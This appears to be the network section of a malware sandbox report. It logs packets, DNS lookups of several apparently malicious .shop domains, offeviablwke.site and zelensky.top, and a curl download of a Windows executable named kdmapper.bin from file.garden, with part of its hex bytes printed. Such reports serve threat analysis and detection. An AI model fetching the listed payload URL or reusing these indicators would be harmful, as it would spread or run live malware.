Sep 30, 2024 18:33:33.391274929 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.391302109 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.391323090 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.391324043 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.391333103 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.391349077 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.391372919 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.391798019 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.391859055 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.391972065 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.392014027 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.392107010 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.392153978 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.469679117 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.469769955 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.470204115 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.470244884 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.470261097 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.470278025 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.470304012 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.470330000 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.470891953 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.470913887 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.470947027 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.470957041 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.470993996 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.471503973 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.471530914 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.471571922 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.471580029 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.471601009 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.471620083 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.472251892 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.472269058 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.472321033 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.472331047 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.472366095 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.472855091 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.472872019 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.472920895 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.472929001 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.472954035 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.472970963 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.476821899 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.476845026 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.476893902 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.476907015 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.476943016 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.477333069 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.477354050 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.477422953 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.477432013 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.477466106 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.512500048 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.512536049 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.512587070 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.512612104 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.512654066 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.561146975 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561228991 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561325073 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.561357021 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561379910 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.561394930 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561399937 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.561423063 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561450005 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.561461926 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561475992 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.561481953 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561523914 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.561527967 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561604977 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.561908007 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.607996941 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.608036041 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:35.359910011 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:35.359942913 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:35.360048056 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:35.363894939 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:35.363910913 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.015290976 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.015410900 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.018822908 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.018835068 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.019160986 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.073596001 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.077083111 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.123392105 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509089947 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509167910 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509175062 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.509188890 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509217978 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509243965 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.509243965 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.509265900 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509291887 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509315968 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.509330034 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.509344101 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.557904005 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.615874052 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.615906000 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.615922928 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.615968943 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.615987062 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.616005898 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.616045952 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.616067886 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.616116047 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.621305943 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.621433973 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.621447086 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.621488094 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.621543884 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.621591091 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.624766111 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.624784946 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.624799013 CEST	49705	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:33:36.624803066 CEST	443	49705	104.102.49.254	192.168.2.7
Sep 30, 2024 18:33:36.643245935 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:36.643296957 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:36.643405914 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:36.643882036 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:36.643893957 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.110898972 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.111074924 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:37.112860918 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:37.112873077 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.113140106 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.114392042 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:37.114422083 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:37.114459038 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.618232012 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.618321896 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.618371964 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:37.618671894 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:37.618689060 CEST	443	49706	172.67.197.40	192.168.2.7
Sep 30, 2024 18:33:37.618700981 CEST	49706	443	192.168.2.7	172.67.197.40
Sep 30, 2024 18:33:37.618705988 CEST	443	49706	172.67.197.40	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:33:28.920409918 CEST	63540	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:28.935391903 CEST	53	63540	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.150866032 CEST	51720	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.217473984 CEST	53	51720	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.223222017 CEST	50403	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.234625101 CEST	53	50403	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.239059925 CEST	60759	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.250467062 CEST	53	60759	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.254192114 CEST	54636	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.264708996 CEST	53	54636	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.268713951 CEST	65440	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.280442953 CEST	53	65440	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.282658100 CEST	64024	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.293987036 CEST	53	64024	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.295906067 CEST	58850	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.305022955 CEST	53	58850	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.312037945 CEST	49694	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.323560953 CEST	53	49694	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.325815916 CEST	51956	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.341551065 CEST	53	51956	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:35.345031023 CEST	56749	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:35.353195906 CEST	53	56749	1.1.1.1	192.168.2.7
Sep 30, 2024 18:33:36.628906965 CEST	57214	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:33:36.642276049 CEST	53	57214	1.1.1.1	192.168.2.7
Sep 30, 2024 18:34:03.740284920 CEST	58423	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:34:03.748002052 CEST	53	58423	1.1.1.1	192.168.2.7
Sep 30, 2024 18:34:11.572530031 CEST	62861	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:34:11.663695097 CEST	53	62861	1.1.1.1	192.168.2.7
Sep 30, 2024 18:34:39.536142111 CEST	50458	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:34:39.544256926 CEST	53	50458	1.1.1.1	192.168.2.7
Sep 30, 2024 18:34:48.243483067 CEST	51686	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:34:48.333282948 CEST	53	51686	1.1.1.1	192.168.2.7
Sep 30, 2024 18:34:55.511776924 CEST	54168	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:34:55.716351032 CEST	53	54168	1.1.1.1	192.168.2.7
Sep 30, 2024 18:35:03.837353945 CEST	64955	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:35:03.845865011 CEST	53	64955	1.1.1.1	192.168.2.7
Sep 30, 2024 18:35:10.308026075 CEST	58614	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:35:10.316037893 CEST	53	58614	1.1.1.1	192.168.2.7
Sep 30, 2024 18:35:16.531891108 CEST	57734	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:35:16.623128891 CEST	53	57734	1.1.1.1	192.168.2.7
Sep 30, 2024 18:35:21.400111914 CEST	65422	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:35:21.492620945 CEST	53	65422	1.1.1.1	192.168.2.7
Sep 30, 2024 18:35:29.781616926 CEST	65145	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:35:30.033530951 CEST	53	65145	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 18:33:28.920409918 CEST	192.168.2.7	1.1.1.1	0xd0f9	Standard query (0)	file.garden	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.150866032 CEST	192.168.2.7	1.1.1.1	0x5af2	Standard query (0)	tiddymarktwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.223222017 CEST	192.168.2.7	1.1.1.1	0xef06	Standard query (0)	surveriysiop.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.239059925 CEST	192.168.2.7	1.1.1.1	0x562a	Standard query (0)	captainynfanw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.254192114 CEST	192.168.2.7	1.1.1.1	0xf7d	Standard query (0)	tearrybyiwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.268713951 CEST	192.168.2.7	1.1.1.1	0xf1c3	Standard query (0)	appleboltelwk.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.282658100 CEST	192.168.2.7	1.1.1.1	0x96f2	Standard query (0)	tendencerangej.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.295906067 CEST	192.168.2.7	1.1.1.1	0x8231	Standard query (0)	fossillargeiw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.312037945 CEST	192.168.2.7	1.1.1.1	0x3d79	Standard query (0)	coursedonnyre.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.325815916 CEST	192.168.2.7	1.1.1.1	0x31b4	Standard query (0)	strappystyio.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.345031023 CEST	192.168.2.7	1.1.1.1	0x63b6	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:36.628906965 CEST	192.168.2.7	1.1.1.1	0xeac9	Standard query (0)	offeviablwke.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:03.740284920 CEST	192.168.2.7	1.1.1.1	0xf981	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:11.572530031 CEST	192.168.2.7	1.1.1.1	0xadf9	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:39.536142111 CEST	192.168.2.7	1.1.1.1	0xc75d	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:48.243483067 CEST	192.168.2.7	1.1.1.1	0x41a0	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:55.511776924 CEST	192.168.2.7	1.1.1.1	0x3254	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:03.837353945 CEST	192.168.2.7	1.1.1.1	0xb10d	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:10.308026075 CEST	192.168.2.7	1.1.1.1	0x6139	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:16.531891108 CEST	192.168.2.7	1.1.1.1	0xb8a5	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:21.400111914 CEST	192.168.2.7	1.1.1.1	0x1a7f	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:29.781616926 CEST	192.168.2.7	1.1.1.1	0xa098	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 18:33:28.935391903 CEST	1.1.1.1	192.168.2.7	0xd0f9	No error (0)	file.garden		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:28.935391903 CEST	1.1.1.1	192.168.2.7	0xd0f9	No error (0)	file.garden		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.217473984 CEST	1.1.1.1	192.168.2.7	0x5af2	Name error (3)	tiddymarktwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.234625101 CEST	1.1.1.1	192.168.2.7	0xef06	Name error (3)	surveriysiop.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.250467062 CEST	1.1.1.1	192.168.2.7	0x562a	Name error (3)	captainynfanw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.264708996 CEST	1.1.1.1	192.168.2.7	0xf7d	Name error (3)	tearrybyiwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.280442953 CEST	1.1.1.1	192.168.2.7	0xf1c3	Name error (3)	appleboltelwk.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.293987036 CEST	1.1.1.1	192.168.2.7	0x96f2	Name error (3)	tendencerangej.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.305022955 CEST	1.1.1.1	192.168.2.7	0x8231	Name error (3)	fossillargeiw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.323560953 CEST	1.1.1.1	192.168.2.7	0x3d79	Name error (3)	coursedonnyre.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.341551065 CEST	1.1.1.1	192.168.2.7	0x31b4	Name error (3)	strappystyio.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:35.353195906 CEST	1.1.1.1	192.168.2.7	0x63b6	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:36.642276049 CEST	1.1.1.1	192.168.2.7	0xeac9	No error (0)	offeviablwke.site		172.67.197.40	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:33:36.642276049 CEST	1.1.1.1	192.168.2.7	0xeac9	No error (0)	offeviablwke.site		104.21.84.213	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:03.748002052 CEST	1.1.1.1	192.168.2.7	0xf981	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:11.663695097 CEST	1.1.1.1	192.168.2.7	0xadf9	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:39.544256926 CEST	1.1.1.1	192.168.2.7	0xc75d	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:48.333282948 CEST	1.1.1.1	192.168.2.7	0x41a0	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:34:55.716351032 CEST	1.1.1.1	192.168.2.7	0x3254	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:03.845865011 CEST	1.1.1.1	192.168.2.7	0xb10d	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:10.316037893 CEST	1.1.1.1	192.168.2.7	0x6139	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:16.623128891 CEST	1.1.1.1	192.168.2.7	0xb8a5	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:21.492620945 CEST	1.1.1.1	192.168.2.7	0x1a7f	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:35:30.033530951 CEST	1.1.1.1	192.168.2.7	0xa098	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

file.garden

steamcommunity.com

offeviablwke.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	188.114.96.3	443	3492	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:33:29 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:33:29 UTC	817	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:33:29 GMT Content-Type: application/octet-stream Content-Length: 2284739 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Fri, 20 Sep 2024 19:21:00 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 853928 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ms6BkWErCFD8RU1%2BlmuMnRXAyDEUIRJW0Yxr9YjlagJAzEXoyup0W%2FSQsljSprbD19y3D53HsZyUY3OWCuuN4VPg6cjj7rcVkDoB%2Ba2io33qiHcMDirLvBtZqL4%2BVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb59d6f98c94392-EWR
2024-09-30 16:33:29 UTC	552	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: 3c cf 00 00 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86 d4 21 Data Ascii: <2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt!
